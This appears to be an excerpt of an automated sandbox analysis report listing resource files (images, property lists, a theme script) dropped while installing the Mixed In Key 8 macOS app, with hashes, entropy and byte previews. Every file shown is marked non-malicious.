SSDEEP:	768:LN/UIDdBwqJl4FIYyyN/UIDdBwqJi85IYyu:LNMI5BwqJIIWNMI5BwqJBIK
MD5:	FCD681B823514954224FD3013FB51F3E
SHA1:	9A79037AE111D459310245D87A8416BEF2F28685
SHA-256:	6E58D312E8EDB162586BF3247E58F2BE61E7A2BED8A4E2771FD33A172C21FA40
SHA-512:	1721430373DF948C626C75C2A81BC7F37A0EFB1E840FB7B690C9668142FBDC45C8D4755871359ACADA078C2CDCBBF742AAE7C664E7D61227A0F045229E153235
Malicious:	false
Preview:	MM.*..&.. P8...=..@........"Q8.V-..FcQ..v=..HdR9$.M'.JeR.dI...........n+.....}?.PhT:%..G.RiT.e6.O.TjU:.V.W.VkU..v._.XlV;%..g.ZmV.e..o.\nW;...w...P....1.`pX<$.............drY<.W-..fsY..w=..htZ=&.M..juZ.f.]..A....<...nt.......N.......ry\.g7...tz]>.W...v{]......{.?% ..Vc.%_/....\|~_?.....~._....... @'..z#.....p...b..0.%...-....5...=....D...r....#.}=@<S....e...m....u...\|..<.!.q\["I.L.%.l.'....)....H2.....l]-....1.,.3..L.5.jG,..1..2..;....=...?....A.s..4...E.m.G...%I..,.P..D.T.=O...EQ.-MS..Q!.]]W...eY..m[..mU\.Umy_....a.-.c..=wd...g....i...k....l..u.o....q.-.s....[....$...]k@.?..<.X....z....\|.7.....n.`i..+...z5.K.0b8.s.L8N..a..5u`....!....G.\}.@.J....z..'..j.qe/...p..........?.......A`.xD&...Ca...F%..Eb.x........W...\|.. ..fU+.Ke....e3.Mf.D....U.A@......?.3zE&".~.@......U..Uz.f.....o..$....+vzP..)....p..<U..{..$....`@.......&[....fb.'...{..w=..htZ>cE..S.@Y+qo!....]..e..mv.x....X.w....('...W.....sy...\.%f..}..f............y\|..G....{}... .om..riG....z..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_czZhAz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	8788
Entropy (8bit):	6.648918294266467
Encrypted:	false
SSDEEP:	192:IO1Wj941hl7eE0lTjeEYNMtKwaWOjNop24B5qRe5t0:IOg+1ziE0xeEYNg7aWOu2eqAt0
MD5:	500F26B00C102FB9526714D61E1DE146
SHA1:	4ADEBC631524E24CB9ACB31C1B0C9217C0595F22
SHA-256:	014ECA7CAB82C3DDAC137A668CAE2552F23D172D803CB307D02200BEDE2D0379
SHA-512:	406C6770582B0E6F09B22DD87673878009B91D4D0E73F45EEABD0D48869B12F6F9368634EC6F2C58AA99A148CB9DAA763BF09623B88D7163B3CDA56710CBF0A8
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top.......Q.......#.$.*...2.8.@.V.d.e.f.k.l.p.u.v.{........................................................... .".%.&.1.2.3.4.8.F.I.J.X.j.......\|.....}...~..................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....>.<.9.O...O.N.P.=.. ...!."[NSClassName...._.(_TtC10MixedInKey22ProgressViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.7..4.5.6.....4.'..9.:.;.....=.>.?XNSSource]NSDestinationWNSLabel............A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.P.Q.T.UWNSFrameYNSpiFlags_..NSHuggingPriorityZNSMaxValue_. NSDoNotTranslateAutoresizingMask_..NSNextResponder_..NSViewIsLayerTreeHost[NSSuperview]NSNibTouchBarXNSvFlags.....@...#@Y...................W... .X.F.E.J

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_de6y4n Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=21, height=40, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=collection-icon-selected@2x.png, orientation=upper-left, width=46
Category:	dropped
Size (bytes):	7872
Entropy (8bit):	6.976097472679615
Encrypted:	false
SSDEEP:	96:fnDj0eOn9swnN26MT0D5MdtbZPAVwzVA6MJHoDN26MT0D5MdtbZPAVwzV0:fnDjnOniwSYNMtKwCH9YNMtKwy
MD5:	7DEE934A47E778182A8D86FDB17340EF
SHA1:	E336A2CE19EEF81D651F1DA46C1C09255B0048CE
SHA-256:	87BDCE55FC78F5A5BF2B89DEF9CC0427DB16F3BD66E84AF4EF09DA6FAC3002D5
SHA-512:	EFD0E72402C04F6FECCFA43037E7D5DBA5BD38B46C5D38321F159F4F8949A543FB832452FF3286D7C25A43A0865CB91E62CD29C86B4AED51FFCDCF9F521291A0
Malicious:	false
Preview:	MM......?.@.$....BaP.d6...DbQ8.2....cQ..v=..E..9$.M'.H...d.]..K.S9.jc5.NgR...}?.M........Rh.J...E}S.T.5:...3`.)eF.[..'.J..9PxAA.$...c.R..J...8.4`.8+.sd.Y.u.<..8]ATpW.#.iU...N....T.EP3..F..x-.....`...sTN.#.........8uC[..Q......j..}...+AA..^....:.<8.B..{.@P^U'... `...T...;J+....r...#z......:h...(.R.. .J...j.i@).Z....f..../ .....0.......>k:.. .b..)1".. ..N...(.....H...)?..q,s...:.-#.;,...).$F.P..I.@.....Z.....p..4l}G....H(,.1...9.+...Lo.M..D.....(....O.e.@..b.Z...<...(KF..).H#.z....?C...4...hx..u.6O..OTJg...uaY#Uj..$...}J.!.F..Z....k...J..b.....z."..(z..(+?h....4.+e............j..t_...~................N.............................(......................................................... .................................................(.............w.....................................(...........1...........=...........R...........S...........s.....H.......................................collection-icon-selected@2x.png.tiffutil v310....HLino....mntrRGB XYZ

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_doOiNg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	35489
Entropy (8bit):	7.043517952322161
Encrypted:	false
SSDEEP:	384:qegUikLWzwDAJE0TeEYNg7MfMTrbvAW6b0iefR1tRWGRCW2EbE2EBOTR5U4JRktH:qegvs0eEYykW6b0JRWGxYx4v6Xnu0F5b
MD5:	DEA9164A8B18E8B7A0D75C7FADC72C18
SHA1:	932B00633CAA7507515DB6AC91A8DCC6D90AEA70
SHA-256:	EF5DB6ED52B9DF52CB2EB1F97431C86CC699A71A680387ECA3D3836FAC6BFD46
SHA-512:	CF33D51FA14020D0478E07A823324C9A69202B49896A0F1685C4D80BC4343F3818015E72DC202422CF6E6B2DA0C87FA5F69B38E859DCA7931203B8316821F2C1
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.j.r.......................................................................................).../.0.5.6.7.<.F.G.H.R.W.X.Y.^._.`.e.o.p.q.{....................................................................................... .%.&.'.,.6.7.8.B.G.H.I.N.O.P.U._.`.a.k.p.q.r.w.x.y.~............................................................................. .%.&.+.,.1.;.<.E.J.K.L.Q.R.S.X.b.c.l.q.r.s.x.y.z.................................................................%.,.0.4.8.;.@.E.H.R.S.T.\.].a.b.e...f.i.j.k.u.v.............................................................................&.../.4.=.H.I.J.O.Y.f.g.h.i.j.k.l.m.v.w...............................................................>................... .$.(.)../.7.B.C.G.f.g.h.n.}...................................A...................................*.+.,.0.9.:.?.@.H.L.T.Z.`.e.f.k.l.v.z.............................................................#.(.-.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_eJTvwN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	137032
Entropy (8bit):	6.683424609062979
Encrypted:	false
SSDEEP:	3072:rDeLmL1AL5QLZMWLoLkV/Lt6LRe/LEYLac+HwsF1jV/cHK:nFOw9XCewfWYNcHK
MD5:	FD4F698B9FF77DC14DFA6B2632800040
SHA1:	B6EAB3965B277E3292BEAA146400B91BE51BCB38
SHA-256:	B138F3188B5478D18BD1B1CD55882AC9948D4E3A79E183F1C84B2DB9B7817DEB
SHA-512:	5A97CCC0BA562BB9D3F484C6446F80637C9E3094A41BA82F9AD6B1C4514E18BE07F3AE064A8EC142EF11C94A8021FD121FCE244AD78F3C30373798DF36DB016E
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top........+.......#.$....2.h.p................................................................................. .!.).,.-...2.7.E.F.G.K.L.O.P.U.............................................".#.$.+.3.7.;.?.E.M.N.S.X.Y.^.c.d.f.i.r.s.y.z.}.............................................................................&.'.-...1.8.=.>.I.J.P.Q.T.[.`.a.b.l.m.s.t.w.~...................................................................................$.)..3.4.:.;.>.E.J.K.P.Q...V.W.\|.}............................................................... .).*.../.4.5.:.C.D.H.I.J.R.V.W.X.[._.`.s.t.u.x............................................................................................... .$.%.&.+.3.4.8.D.E.F.M.P.Q.V.^._.c.o.p.q.x.{.\|.................................................................m...............u.............#.%...2.3.4.8.;.<.A.I.J.N.Z.[.\.c.f.g.l.t.u.y.........................................................5...-.../.0.3.7.<.?.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_fO94D8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.105485741649838
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFypgqypEogLDGLXNukUgw7mgOGt7SgOGFB99n:2dfyiwgOqypiOLdukUgwrOGtPOGFD9
MD5:	92BFCE18DDF9194FE31CD0664C2A82CD
SHA1:	BEC40D7A055D513762F1ACAD41BC8FC8C77A7A6C
SHA-256:	B69C7819208EF063A20FD071C45021A0F7CB51F2ED24E87479AFE8B50D40B1C7
SHA-512:	DE92D782C3DD6E9647697AB47F632E26E3E9B9B85EE7B47978D2636B9F62EBAE135E1AEA17C978CE8548762DC6AE3BA75B5612EF224D7A0154E17D24B0279B34
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>tableHeaderBackgroundImage</key>..<string>header-background.png</string>..<key>name</key>..<string>Default</string>..<key>version</key>..<integer>0</integer>..<key>mainThemeImage</key>..<string>main-theme.png</string>..<key>analysisMessageImage</key>..<string>analysis-message.tiff</string>..<key>topURL</key>..<string>html/top.html</string>..<key>labelColor</key>..<string>102 120 102</string>..<key>tableColor</key>..<string></string>..<key>tableHighLightColor</key>..<string>25 203 255</string>..<key>tableHighLightBackgroundImage</key>..<string>row-background.png</string>..<key>tableHighLightNoFocusBackgroundImage</key>..<string>row-background-nofocus.png</string>..<key>tableHighLightNoFocusColor</key>..<string></string>..<key>tableLinkColor</key>..<string>0 0 255</string>.</dict>.</plist>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_fxmf3z Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	869
Entropy (8bit):	7.658809722807515
Encrypted:	false
SSDEEP:	12:6v/7K/sOKDRUAZrYWm2bv0F1FQcyafv0DEr55WEh32ZPzOVa0smETkzwJzzN:T4Sc/mJF1FQgv0Du3oPzeFgEwJt
MD5:	4C804C93213D0FBC2FCA2D7590B63EAE
SHA1:	9507D931B84229F9673975F037B133CFC54F441A
SHA-256:	50C5EF8B2A85900DE0959F2527C3F84CA1EA068DBA98CB44ADF3C3DB5417DB18
SHA-512:	D3A4209DB3AD64778A4D4F82609452777F6A0AFB475B820B256FA47B83448B4673123C711172B0C7D8ACC51E6EFB854D34E659B3B22AB3B5094F736E01D35864
Malicious:	false
Preview:	.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.U.0.5y..6.m...f...............&H:Ar.4L.n.lPx.$.lKI.C...Kl.[..-..m[A,.R.tf<..Bi.tg<....@.d.t..!..n..I.j....-.....}?L....M...l....x]\|P...TL+..{..b.J........JL..YP.LFlf....J...P.........P....jI.&T...&....4).....k<..>...x...6.......m.@...p...$.~S..I.M......n........9A4.aZ.K2..e.yT.....`'B%.].`..~........,..e..Iu..qy.0WpO...5..\.:4.&.. .yv;....o.....>..C....XjH.\..;.....~Q.tM...{.1.^..&...D......E.H.Od....p.9..-c..=`.5....dK..g.p7.{.f.7..Qr..r.`a.......K6..`1.......q...K..^........J.>......0=.5.z....a....a..;0..ab="{.FzVA2p..tm...}q......^....1..b...SO]/..Z.i.G.%.b.@...d...M.._6.+(..6>......l...Nu.......A..rIa..........^.g.}..\|...s.[.x..m.sA_.....t.a...F....Y.U.L.]J8G...L.{.I}.+..PW..G..8qu....*.t9......VCl9(..b.....N.....g......~.t&Q.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_gdCekE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 23 x 20, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	954
Entropy (8bit):	6.53143682098142
Encrypted:	false
SSDEEP:	24:g/6PYWuZ9Mylnv/SxxzwKwBMUawVok1lXqukj:g/6NMvcxMhBMUnNXqZj
MD5:	378B4557544CA5B05873FD646C38C5F8
SHA1:	93736930523AFBD0DDF9AA5B49E6DA3383276027
SHA-256:	D6EFE7881C8BA63E7B54D49FA787BE2243A2E78D6FD41A1925BC9A35B385495A
SHA-512:	B4198CCAB4DECFCE5EC28F282185D2E3C3A14AE184CC530F960F1968F548FD0A450E161E46F6ED2F7D1CFB2AABFAA556E6B280F3008B51357F5FCC629D7981B5
Malicious:	false
Preview:	.PNG........IHDR.............f.......sRGB.........pHYs................0iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <xmp:CreatorTool>Acorn version 4.5.2</xmp:CreatorTool>. <tiff:Compression>5</tiff:Compression>. <tiff:YResolution>72</tiff:YResolution>. <tiff:XResolution>72</tiff:XResolution>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>...3M...#IDAT8..+..0...p.... ..$..f..2.`=xV.E...0X..{.#...&.....<...[.......a.4d.6...m..vSPQ0.yN.Q.l....<.......%...2..}(..t..F<.]...y.A..`.....i......:2M...c\..,....i...UU1.5.............o.q..>....wI..a..q$nY.r.../.q.....<. q.0......0..4...8.}..#.6..DQtb.o..$I@UU..{B..i.E!.2x\|cd...[......;.$..~....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_gf7iOC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1365
Entropy (8bit):	4.937763229891162
Encrypted:	false
SSDEEP:	24:nJRd/aaRR+fqRRKa9RRg1RR+fzRRKawRRgg4RR+fzRRKa9RRgNMRR+fzRRKa9RR/:nJR5aayfqGa9M1yfzGawMg4yfzGa9MNz
MD5:	7366249E912217EB37327DDD26C91CF5
SHA1:	0FE27D2B2B10C0E80A7A85660626A9FA3CFC8957
SHA-256:	86783DCB04B7D13C9DFF3B47DAF1AA1B2462339D5E37CDE3CA0C4B587283BACD
SHA-512:	F354E70B8C7A5091000FDBA82DDD0C0F6D209AEBAFCEF9C880BD7ED8B56473129F9F766EC54D03E6F0EBAF9C4E9F82F77B71AEACA2B5D6B6DD41DAB8F9F19AE8
Malicious:	false
Preview:	/..Javascript for Mixed In Key top theme..Copyright 2008 Mixed In Key LLC.. /../.The following functions are required for navigation. /..//.Selects the tab with the specified identifier after.//.the the pane selection changed in the appliation..//..function selectTab(tabId).{..if ( tabId == 'browse' ) {...document.getElementById('browse').className...= 'first tab selected';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'tagedit' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab selected';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'preferences' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab selected';..} else {...document.getElementById('browse').cl

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_hJbyHw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mac OS X icon, 959062 bytes, "ic08" type
Category:	dropped
Size (bytes):	959062
Entropy (8bit):	7.992276888459757
Encrypted:	true
SSDEEP:	24576:qrU5rJNf1alEyc5b8RTJW8wHq2FrU5r2o7P0Bvo7P0j:wwlal71OwD7sBA7sj
MD5:	CDAABACF66ADAA4E2944D89E40A5C2C7
SHA1:	02D0A97412DC7350B84D142621E784EAF331EE3F
SHA-256:	C63F58A16857BAEB212479BE79500A7B3353C9A244AC2FDB38C0618708C2C6EF
SHA-512:	DE1E02ACA0CD9AB9D5D030ADA46BD3E1DD3143E80CBF74F0BF7F7AE630ADE4320E012D3F1403AD44741809AEAC0E6476F5B31F057B2E10ABADC8D1D073C642CD
Malicious:	false
Preview:	icns...Vic08...S....jP ........ftypjp2 ....jp2 ....jp2h....ihdr..................colr.......appl. ..mntrRGB XYZ ............acspAPPL....appl...........................-appl................................................desc.......odscm...x...lcprt.......8wtpt........rXYZ...0....gXYZ...D....bXYZ...X....rTRC...l....chad...\|...,bTRC...l....gTRC...l....desc........Generic RGB Profile............Generic RGB Profile..................................................mluc............skSK...(...xhrHR...(....caES...$....ptBR...&....ukUA...*....frFU...(...<zhTW.......ditIT...(...znbNO...&....koKR........csCZ..."....heIL........deDE...,....huHU...(...JsvSE...&....zhCN.......rjaJP........roRO...$....elGR..."....ptPO...&....nlNL...(....esES...&....thTH...$...6trTR..."...ZfiFI...(...\|plPL...,....ruRU..."....arEG...&....enUS...&....daDK.......>.V.a.e.o.b.e.c.n... .R.G.B. .p.r.o.f.i.l.G.e.n.e.r.i...k.i. .R.G.B. .p.r.o.f.i.l.P.e.r.f.i.l. .R.G.B. .g.e.n...r.i.c.P.e.r.f.i.l. .R.G.B. .G.e.n...r.i.c.o...0.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_hUE8sz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	5943
Entropy (8bit):	6.6000972810989005
Encrypted:	false
SSDEEP:	96:Zg0b1WsYv7tfo9p1OKUeWFZ5Wjhs+GNoGWhPULrFx4VygfhS8rHJCrDVF:mA1Wsy7JgDOTFZ5Wjhs+GNoGEC+NkaHW
MD5:	62A21700E46E492C89AB2FCC727766EE
SHA1:	B625BDB5BF9D4B4AFA9DEB1EEBCD9027C71540BC
SHA-256:	5DB5E30C764C58FCB74EE6DD415333D2AF39D43EE8DFF348B8EA74E259814A78
SHA-512:	6D20BDDB1A48688F9F98AD1DAF5C18D8E2869547C0599119B342454D11651E5A092A536449A13AADE7E88F69F2CC081EF2A213B8CE8BEC34BBC2E77DD6770784
Malicious:	false
Preview:	bplist00..............8.9X$versionX$objectsY$archiverT$top.......x.......#.$....2.:.B.`.l.o.s.....................................................................................&.3.6.<.B.H.Q.V.X.[.\.e.k.p.u.{........................................./.8.>.P.......D..... .!.".#.$.%.&.'.(.)..+.,.-.../.2.5U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....Y.W.T.v...v.u.w.X.. ...!."[NSClassName...._.._TtC10MixedInKey28ArtworkPopoverViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8.....J.M.O....;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel............C.D.E.F.G.H.I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.R.V.R.[.\.].Q.__..NSPlaceholderImageYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSv

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_hbMqlw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	559
Entropy (8bit):	7.483323322503398
Encrypted:	false
SSDEEP:	12:6v/7vHh5vGvBLN74zVXxnTA51pZi09a63suv8Vl4xezr99TIjoF5:45vub7qVXlIRds5xx9Ijo/
MD5:	5380EBE31A48AD7A056836C7A524562F
SHA1:	44EA8FB34D4D99E6106FBBC397B1D0A2A1C63B88
SHA-256:	EACA04DF83B1722C80CDA74061F069497AF4298E72B1622B0B6BD76DD7676D1A
SHA-512:	8CED57661DFE4B2A6C3AB38AE54DF5F9FBFFC1137F3839833AF26F898601E813FB59158C4EB6DDE03503155D9455D45B773010F43A0712F5155378EE2E34BAEF
Malicious:	false
Preview:	.PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..m.0.E...0.7(... ..n..m'.:..d...a............w.../..N....Yy.@y.#\..>.....=.......n.^U....5...~.>...@y..S...Cr..... G..]...n...U..I.C.32}pq.w../0U.v.)....l..m.@..P.Y).h.R.&..`P....J....6....S..4j..,.fTk.q\..&..{...6.MZa..9...&..i..../........M..Mb......ZdI...-r.....2!.`.]...Q...[G..%.k.<x..09QA8..%...P9....h%S-.....B.).+&X.T\|..^x.!.V.A...s..d5/...x@.?A..?/t..\....R.@H(I..J.:Z...j%..`.......An....ENi..H.u+ )..@"......re.+@.Z..:...'[...`..fa.zp{.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_jSuZdo Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=20, height=176, bps=1, compression=LZW, PhotometricIntepretation=RGB, description=mik-top-right@2x.png, orientation=upper-left, width=918
Category:	dropped
Size (bytes):	108888
Entropy (8bit):	7.9579195875467565
Encrypted:	false
SSDEEP:	3072:mtLKyyHxTeNaCNDkbGjfb8918GftXRPj/qv7mqQ5+Uu2GK:iedH05NpP88ap9EQ9
MD5:	3E2796C3A8DFE433D22DB7CC414E1EF5
SHA1:	DF83591755ABFD478A81F95C2942AE689B2ECE68
SHA-256:	DA74013E33AE2387D36F1723714FB85FDACEBD7F46E61579D8C7CA993295547F
SHA-512:	B6BFDA7FC5B30798416454759C3ACB7C519E5D17DAB91A18AE925A6B422ECAF7AFD537E36F78575D41D537B340708A5C8D1A56E72B761A8E033127881DE75B7A
Malicious:	false
Preview:	MM...^..? @.$....BaP.d6...DbP......FcQ.K...{..h.rM...%2yd"W...ar...36.Mg0Y...8....)U.v.............t..V.A.?..w...W... H.J.=.X#..T.m=..a..l..r.^oQK,..{.`o.g..p.`qP.N.Q~.`...]....A. P....>....E...3L.[...v8....D.Y%Q.....}>..H..........@...v/..../......~.^.H......>.......r=.n.y..C..~.......,..H.T.)(... 0.....$..'y.~)M.N.7K.J.....:.+,.@IdI..1J.....T......1....Bq."...3../.l\|..1..;..........@ ...@...........J{L.....tn..rt^.r:...:.4..#....H.>...............Tl..NS4..:Sd.<E......"..G......."...O..TN.SO.cNMR.&.V..h....=X.J..(.su\..heYd.. .EMu...A/...@.!.....oYO.B..g..SX.... ..i.h .T..e.iX.k........h..I%...."X...[.D.....x....q...M...XRn..2;.........R....hE...R.....]a......Q..V...dK...f.ZP\|.@.J..@......J.....c.C]Mi...J.y&..s.;.i...M./..w....V.{\|T.h\.U^a2.I.S.o..p...0....7i^..Wn..)..{,. {="...)jr.?@.0w..\|c._..,Wz!.3.-.......K.~6]J'a0.w...._7...#.`.R.*.I.SG'...U-...kz_.x..w../C..%.^..Wo~...\|."hb.M...". +........Y..b.(....>...u.....IV.eU......Y=d.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_km2LkK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=21, height=40, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=collection-icon@2x.png, orientation=upper-left, width=46
Category:	dropped
Size (bytes):	7816
Entropy (8bit):	6.9663285201290215
Encrypted:	false
SSDEEP:	96:VX6XRJce2ENT9FUN26MT0D5MdtbZPAVwzVKJH8rWHXXJN26MT0D5MdtbZPAVwzV0:VGvcDENfYNMtKwwPHXoYNMtKwy
MD5:	7B0C6003481E500C00860F4706DAC5D5
SHA1:	651D3A04CBCA2D881C8D5301F29D94B9CCAF3CC8
SHA-256:	E7C7B33A6BEC672CCEA8F7EB319C1A1021F62AD787A0DE9E26341EE2003DCACC
SHA-512:	1C975BF13E0F9E9BF6A7625E7EBEECCD1F8B1724BF6AA38BA428641220B7B9AE1413435DB963BE7D30D6DFF36E291C9E71B9EF2143A60562A2815B93182CFA72
Malicious:	false
Preview:	MM......?.@.$....BaP.d6...DbQ8.2....cQ..v=..E..9$.M'.H...d.]..K.S9.jc5.NgR...}?.M..:$..E.Rbtx.U,.0AD.e...E5..4.dR..@AO....V..ktZ.N....&VX%..W.Z...m>....n...../.[/.......`........bU...?...mL.>j#_ AW...F...J.....M..j...Q.._..q4M.>......R..0.Ay..g2...qst..3E..z.%.....i......_..5>9vZ...b.../.....{..?.V..G........t..$....Kp...".B0...$...#...:1.G.@."?.+PTR.#.lZ......#....(.... ..\.G...D.B?.7.{...../..2z)..1..#1..u%....HR"K!.;..G..G5.M..$.6K.....O..b..#........Y...)l....s.:.."..+R..R./.....=.-.sHI.....u-?[..Uq]...y_.5.a.4..c....H.V\...........................(.............@...............................................P.............................................(.............%...........0...........8.............(...........1.........h.=...........R...........S.........H.s.....H...v....................................collection-icon@2x.png..tiffutil v310....HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ..............................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_lKtmjh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 88 x 322, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	5.082986074392192
Encrypted:	false
SSDEEP:	12:6v/77ZMQGPcz30X0verrcbOizou6JFju6JFju6JFju6cdGOsVUfgQOfI:4zGbkv4usjusjusjuNGlQOQ
MD5:	509E97E4A74A9635BB1A4A3C21E9C99B
SHA1:	739D2F8A58F31963A01BE28BFA4506CE66984398
SHA-256:	EA4659780EE50EBC1A8677CB23F50A358FF138C2B2510BA2A52B21F71C8505B5
SHA-512:	68CE3AFF3295DCF38C52F6868AAE8BEC00D3896025229C0952C2BAE8B474395CB0A35BE42EAD2B5A49B02BAA9C228FA7D864D8B2827A6BD214D6C147F3A247BB
Malicious:	false
